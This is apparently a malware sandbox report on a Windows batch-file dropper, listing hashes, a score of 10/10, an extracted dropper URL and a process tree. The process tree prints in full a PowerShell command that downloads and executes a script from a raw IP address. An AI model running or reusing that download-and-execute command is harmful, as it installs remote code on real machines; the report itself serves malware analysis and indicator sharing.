Analysis

  • max time kernel
    64s
  • max time network
    68s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    17-05-2020 19:10

General

  • Target

    8b2ade35891baaef15ef7a7670b22a8b.bat

  • Size

    221B

  • MD5

    ae1d5d2c71f6e5d19efa142f75f7411a

  • SHA1

    f644c336bd882f8c23cb39b3cc008ce556cad0c6

  • SHA256

    467fc34c41ce35f920d6b34e72bf58ea3a4081a032d12ed77448d9a35363d589

  • SHA512

    9647aede24a87f35b7557c6c40d92ff2d6b13ccdcce16b9c81f4c9b511e19e6319413882b4432793118fa8a36e0ea7624aac5950b6248b2415ebcd6e3533e586

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/8b2ade35891baaef15ef7a7670b22a8b

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8b2ade35891baaef15ef7a7670b22a8b.bat"
    1⤵
      PID:2536
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8b2ade35891baaef15ef7a7670b22a8b');Invoke-GZDKNPZKBPXNDW;Start-Sleep -s 10000"
        2⤵
          PID:584
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:400

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/400-0-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

        Filesize

        4KB